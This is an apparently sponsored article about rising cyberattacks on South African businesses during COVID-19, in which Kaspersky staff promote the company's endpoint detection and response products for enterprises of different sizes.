South African businesses face numerous challenges, not least of all due to long-prevailing stagnant economic growth and this impact on business operations, all of which has been exacerbated by the impacts of COVID-19. However, adding to existing pressures, the spate of cyberattacks and exploits on local enterprises that have made headlines in recent months demonstrate that no entity - regardless of size, location or type of business - is untouchable.
For the first half of this year (H1-20), and as much of the world went into lockdown with more people connecting remotely, research by Kaspersky – a leader in cybersecurity solutions - has consistently cited increasing activity by cybercriminals, with rising numbers in malware, phishing and advanced persistent threat (APT) driven attacks. Further to this, Kaspersky has identified a growing trend globally of hacking into enterprises, including small and medium sized businesses, by hacking-for-hire groups.
Such a threat actor generally does not engage in any type of activity commonly associated with the cybercrime underworld meaning that in many cases, these groups are not likely to be a part of the cybersecurity risk model for most businesses. This however is cause for concern as their interest is in gathering sensitive business information where the threat actor is known to be highly adaptive, using an iterative, fast-paced approach to software design, making them able to execute effective campaigns.
It is evident then that preparedness, in the face of digital threats that are rapidly growing in number and sophistication, is the name of the game for businesses that want to protect, survive and thrive in the digital age.
Assessing the risks
Kaspersky senior security researcher Maher Yamout says that as many new users are connecting to the Internet in South Africa, particularly since the COVID-19 pandemic struck, cybercriminals have been quick to follow where there is increased Internet activity.
“What makes the market even more attractive for hackers is that South Africa has many small- to medium-sized enterprises that are now online due to the restrictions – or opportunities – as a result of COVID-19. Typically, these enterprises neither have matured IT security systems or skills nor the capital to build it, making them more vulnerable to cyberattacks,” states Yamout.
He laments that cybercriminal activity will only continue to grow in sophistication and businesses, across any sector, will remain targets to such digital threats. “Businesses of all make and size must therefore look to invest in adequate IT security solutions, to safeguard their corporate network and prevent business disruption and damage by eliminating the risks posed by complex and targeted threats.”
According to Yana Shevchenko, Kaspersky senior product marketing manager, the leading drivers for cybersecurity spend are to reduce incidents and breaches, meet regulatory requirements around cybersecurity and build a clear process of investigation and response to cybersecurity incidents.
Shevchenko points out that counteracting today’s advanced threats and complex attacks require an established incident response process – from collecting data, analysing data, discovering threats, checking what is relevant and investigating the causes to neutralising the problem to limit damage. The process also involves recovery to ensure business continuity. And to do this in the face of a global shortage of IT security personnel and expertise.
Starting at the Endpoint
Corporate endpoints, where data, users and corporate systems all come together to generate and implement business processes, are particularly vulnerable.
Implementing the full endpoint protection cycle – from automatic threat-blocking to responding swiftly and appropriately to complex incidents – requires preventive technologies supplemented by advanced defence capabilities.
In this regard, Kaspersky Endpoint Detection and Response (EDR), in addition to Endpoint Protection Platform (EPP) capabilities, provides comprehensive visibility across all endpoints on the corporate network, as well as superior defences, allowing for quicker response time and the ability to automate more routine tasks to discover, prioritise, investigate and neutralise complex threats and targeted attacks.
However, Shevchenko points out that it’s important to remember that an EDR is not self-operated. “Well-trained security experts are needed to maximise EDR investment and take advantage of its full power.”
Shortcut to skills
Shevchenko notes that as corporate processes undergo extensive, across-the-board automation, businesses are becoming increasingly dependent on information technologies.
However, the more dependent on IT an enterprise becomes the more attractive the idea of hacking its information systems becomes.
“Businesses often struggle to find the expertise and staff needed to track down today’s modern threats and respond appropriately, and existing IT teams can become overwhelmed by managing systems and tools, leaving little time for thorough security incident investigation and analysis,” she explains.
Shevchenko states that Kaspersky EDR is quick and easy to implement, and reduces the time needed for initial evidence collection while providing supreme telemetry analysis. With Kaspersky’s EDR maximising the automation of the incident response process, overall response times are reduced from days or hours to minutes.
For more IT-security-matured enterprises, Kaspersky provides IT security experts with powerful Kaspersky EDR for advanced threat discovery, deep investigative capabilities powered by MITRE ATT&CK framework mapping and Kaspersky Threat Intelligence, threat hunting and a centralised response to multi-stage complex attacks.
Global cybersecurity evaluator MITRE, in their Round 2 (APT29) test, has confirmed Kaspersky EDR’s high level of performance in detecting key techniques applied at crucial stages of modern targeted cyberattacks. Additionally, Kaspersky continues to enrich its EDR detections with data from the MITRE ATT&CK knowledge base, which is a collection of attackers’ arsenals and behaviours globally.
Shevchenko notes that the MITRE ATT&CK knowledge base provides additional context to handle advanced threats more efficiently.
For smaller enterprises, Kaspersky EDR Optimum provides basic EDR capabilities, which caters to businesses with limited resources and cybersecurity expertise. Kaspersky EDR Optimum can be further enforced with automated Kaspersky Sandbox, helping companies to counteract new threats capable of bypassing endpoint protection.
To further accommodate businesses with limited cash resources, Kaspersky’s Managed Detection and Response help businesses to conduct threat hunting and deliver a swift reaction to cyberthreats and incidents.
For large enterprises, Kaspersky offers extended EDR capabilities, as well as an anti-targeted attack platform, which builds reliable defences that protect corporate infrastructure from the most sophisticated threats and APT-like attacks while helping to support regulatory compliance.
“Kaspersky Anti Targeted Attack Platform combines network-level advanced threat discovery and EDR capabilities and acts as an Extended Detection and Response solution delivering all-in-one APT protection powered by our Threat Intelligence and MITRE ATT&CK framework,” Shevchenko summarises.
Kaspersky has an overall rating of 4.9 out of 5 in the EDR market, according to Gartner Peer Insights, based on 159 ratings as of May 2020.